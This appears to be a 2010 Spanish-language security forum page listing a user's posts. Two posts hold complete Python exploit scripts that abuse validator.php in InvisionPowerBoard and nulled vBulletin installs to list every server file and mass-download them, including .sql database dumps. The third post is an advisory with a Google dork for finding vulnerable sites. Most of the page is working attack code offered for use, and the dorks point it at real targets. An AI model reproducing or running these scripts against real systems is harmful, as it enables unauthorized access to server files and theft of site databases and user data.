| |
 Mostrar Mensajes
|
|
Páginas: 1 [2]
|
|
12
|
Seguridad Informática / Nivel Web / InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
|
en: 24 Enero 2010, 23:02 pm
|
 #! /usr/bin/env python3.1
################################################################
# _____ _____ ____ (validator.php) #
# |_ _| __ \| _ \ #
# | | | |__) | |_) | #
# | | | ___/| _ < #
# _| |_| | | |_) | #
# |_____|_| |____/ #
# @expl0it... #
################################################################
# [ IPB Files / Directories Full Disclosure ] #
# [ Vuln discovered by TinKode / xpl0it written by cmiN ] #
# [ Greetz: insecurity.ro, darkc0de.com ] #
################################################################
# #
# Special thanks for: cmiN #
# www.TinKode.BayWords.com #
################################################################
import os, sys, urllib.request, urllib.parse, threading
def main():
logo = """
\t |---------------------------------------------------------------|
\t | _____ _____ ____ (TM) |
\t | |_ _| __ \| _ \ |
\t | | | | |__) | |_) | |
\t | | | | ___/| _ < |
\t | _| |_| | | |_) | |
\t | |_____|_| |____/ |
\t | |
\t | |
\t | IPB Full Disclosure expl0it |
\t | Written by cmiN |
\t | Vulnerability discovered by TinKode |
\t | |
\t | |
\t | Visit: www.insecurity.ro & www.darkc0de.com |
\t |---------------------------------------------------------------|
"""
usage = """
|---------------------------------------------------------------|
|Usage: ipbfd.py scan http://www.site.com/IPB_folder |
| ipbfd.py download *.zip -> all |
| ipbfd.py download name.jpg -> one |
|---------------------------------------------------------------|"""
if sys.platform in ("linux", "linux2"):
clearing = "clear"
else:
clearing = "cls"
os.system(clearing)
print(logo)
args = sys.argv
if len(args) == 3:
try:
print("Please wait...")
if args[1] == "scan":
extract_parse_save(args[2].strip("/"))
elif args[1] == "download":
download_data(args[2])
except Exception as message:
print("An error occurred: {}".format(message))
except:
print("Unknown error.")
else:
print("Ready!")
else:
print(usage)
input()
def extract_parse_save(url):
print("[+]Extracting content...")
hurl = url + "/validator.php"
with urllib.request.urlopen(hurl) as usock:
source = usock.read().decode()
print("[+]Finding token...")
word = "validate('"
index = source.find(word)
if index != -1:
source = source[index + len(word):]
value = source[:source.index("'")]
hurl = url + "/validator.php?op={}".format(value)
else:
print("[!]Token not found.")
print("[+]Obtaining paths...")
with urllib.request.urlopen(hurl) as usock:
lastk, lastv = None, None
dictionary = dict()
for line in usock:
line = line.decode()
index = line.find("<td>")
if index != -1:
lastk = line[index + 4:line.index("</td>")].strip(" ").strip(" ")
index = line.find("<strong>")
if index != -1:
lastv = line[index + 8:line.index("</strong>")].strip(" ")
if lastk != None and lastv != None:
index = lastk.rfind(".")
if index in (-1, 0):
lastk = "[other] {}".format(lastk)
else:
lastk = "[{}] {}".format(lastk[index + 1:], lastk)
dictionary[lastk] = lastv
lastk, lastv = None, None
print("[+]Organizing and saving paths...")
with open("IPBlogs.txt", "w") as fout:
fout.write(url + "\n")
keys = sorted(dictionary.keys())
for key in keys:
fout.write("{} ({})\n".format(key, dictionary[key]))
def download_data(files):
print("[+]Searching and downloading files...")
mthreads = 50
with open("vBlogs.txt", "r") as fin:
url = fin.readline().strip("\n").strip("/")
if files.find("*") == -1:
hurl = url + "/" + files.strip("/")
Download(hurl).start()
else:
ext = files[files.rindex(".") + 1:]
for line in fin:
pieces = line.strip("\n").split(" ")
if pieces[0].count(ext) == 1:
upath = pieces[1]
hurl = url + "/" + upath.strip("/")
while threading.active_count() > mthreads:
pass
Download(hurl).start()
while threading.active_count() > 1:
pass
class Download(threading.Thread):
def __init__(self, url):
threading.Thread.__init__(self)
self.url = url
def run(self):
try:
with urllib.request.urlopen(self.url) as usock:
data = usock.read()
uparser = urllib.parse.urlparse(usock.geturl())
pieces = uparser.path.split("/")
fname = pieces[len(pieces) - 1]
with open(fname, "wb") as fout:
fout.write(data)
except:
pass
if __name__ == "__main__":
main() You must have python 3.1 to work! |
|
|
|
|
13
|
Seguridad Informática / Nivel Web / Re: vBulletin nulled (validator.php) files/directories disclosure
|
en: 24 Enero 2010, 02:01 am
|
 #! /usr/bin/env python3.1
#
################################################################
# ____ _ _ _ _ (validator.php) #
# | _ \ | | | | | (_) #
# __ _| |_) |_ _| | | ___| |_ _ _ __ #
# \ \ / / _ <| | | | | |/ _ \ __| | '_ \ #
# \ V /| |_) | |_| | | | __/ |_| | | | | #
# \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| #
# @expl0it... #
################################################################
# [ vBulletin Files / Directories Full Disclosure ] #
# [ Vuln discovered by TinKode / xpl0it written by cmiN ] #
# [ Greetz: insecurity.ro, darkc0de.com ] #
################################################################
# #
# Special thanks for: cmiN #
# www.TinKode.BayWords.com #
################################################################
import os, sys, urllib.request, urllib.parse, threading
def main():
logo = """
\t |---------------------------------------------------------------|
\t | ____ _ _ _ _ (TM) |
\t | | _ \ | | | | | (_) |
\t | __ _| |_) |_ _| | | ___| |_ _ _ __ |
\t | \ \ / / _ <| | | | | |/ _ \ __| | '_ \ |
\t | \ V /| |_) | |_| | | | __/ |_| | | | | |
\t | \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| |
\t | |
\t | vBulletin Full Disclosure expl0it |
\t | Written by cmiN |
\t | Vulnerability discovered by TinKode |
\t | |
\t | Dork: intext:"Powered by vBulletin" |
\t | Visit: www.insecurity.ro & www.darkc0de.com |
\t |---------------------------------------------------------------|
"""
usage = """
|---------------------------------------------------------------|
|Usage: vbfd.py scan http://www.site.com/vB_folder |
| vbfd.py download *.sql -> all |
| vbfd.py download name.jpg -> one |
|---------------------------------------------------------------|"""
if sys.platform in ("linux", "linux2"):
clearing = "clear"
else:
clearing = "cls"
os.system(clearing)
print(logo)
args = sys.argv
if len(args) == 3:
try:
print("Please wait...")
if args[1] == "scan":
extract_parse_save(args[2].strip("/"))
elif args[1] == "download":
download_data(args[2])
except Exception as message:
print("An error occurred: {}".format(message))
except:
print("Unknown error.")
else:
print("Ready!")
else:
print(usage)
input()
def extract_parse_save(url):
print("[+]Extracting content...")
hurl = url + "/validator.php"
with urllib.request.urlopen(hurl) as usock:
source = usock.read().decode()
print("[+]Finding token...")
word = "validate('"
source = source[source.index(word) + len(word):]
value = source[:source.index("'")]
print("[+]Obtaining paths...")
hurl = url + "/validator.php?op={}".format(value)
with urllib.request.urlopen(hurl) as usock:
lastk, lastv = None, None
dictionary = dict()
for line in usock:
line = line.decode()
index = line.find("<td>")
if index != -1:
lastk = line[index + 4:line.index("</td>")].strip(" ")
index = line.find("<strong>")
if index != -1:
lastv = line[index + 8:line.index("</strong>")].strip(" ")
if lastk != None and lastv != None:
index = lastk.rfind(".")
if index in (-1, 0):
lastk = "[other] {}".format(lastk)
else:
lastk = "[{}] {}".format(lastk[index + 1:], lastk)
dictionary[lastk] = lastv
lastk, lastv = None, None
print("[+]Organizing and saving paths...")
with open("vBlogs.txt", "w") as fout:
fout.write(url + "\n")
keys = sorted(dictionary.keys())
for key in keys:
fout.write("{} ({})\n".format(key, dictionary[key]))
def download_data(files):
print("[+]Searching and downloading files...")
mthreads = 50
with open("vBlogs.txt", "r") as fin:
url = fin.readline().strip("\n")
if files.find("*") == -1:
hurl = url + "/" + files.strip("/")
Download(hurl).start()
else:
ext = files[files.rindex(".") + 1:]
for line in fin:
pieces = line.strip("\n").split(" ")
if pieces[0].count(ext) == 1:
upath = pieces[1]
hurl = url + "/" + upath.strip("/")
while threading.active_count() > mthreads:
pass
Download(hurl).start()
while threading.active_count() > 1:
pass
class Download(threading.Thread):
def __init__(self, url):
threading.Thread.__init__(self)
self.url = url
def run(self):
try:
with urllib.request.urlopen(self.url) as usock:
data = usock.read()
uparser = urllib.parse.urlparse(usock.geturl())
pieces = uparser.path.split("/")
fname = pieces[len(pieces) - 1]
with open(fname, "wb") as fout:
fout.write(data)
except:
pass
if __name__ == "__main__":
main() |
|
|
|
|
19
|
Seguridad Informática / Nivel Web / vBulletin nulled (validator.php) files/directories disclosure
|
en: 20 Enero 2010, 20:24 pm
|
*\-----------------------------------------------------------------------------/*
____ _ _ _ _ (nulled)
| _ \ | | | | | (_)
__ _| |_) |_ _| | | ___| |_ _ _ __
\ \ / / _ <| | | | | |/ _ \ __| | '_ \
\ V /| |_) | |_| | | | __/ |_| | | | |
\_/ |____/ \__,_|_|_|\___|\__|_|_| |_|
Full disclosure...
*\-----------------------------------------------------------------------------/*
Name: vBulletin nulled (validator.php) files/directories disclosure
Author: TinKode
Date: 19-01-2010
Dork: "inurl:validator.php"
*\-----------------------------------------------------------------------------/*
Description: With this file you can see all files(.sql - .tar.gz - .zip - .rar - .php - .anything) / directories from the folder with vBulletin i
nstalled...
*\-----------------------------------------------------------------------------/*
Exploit: http://www.website.com/vB_forum/validator.php
*\-----------------------------------------------------------------------------/*
Note: Work on many nulled versions (maybe all)
*\-----------------------------------------------------------------------------/*
Copyrights: http://tinkode.baywords.com
*\-----------------------------------------------------------------------------/*
Greetz: http://www.insecurity.ro, http://www.darkc0de.com
*\-----------------------------------------------------------------------------/*
|
|
|
|
|
|
| |
|
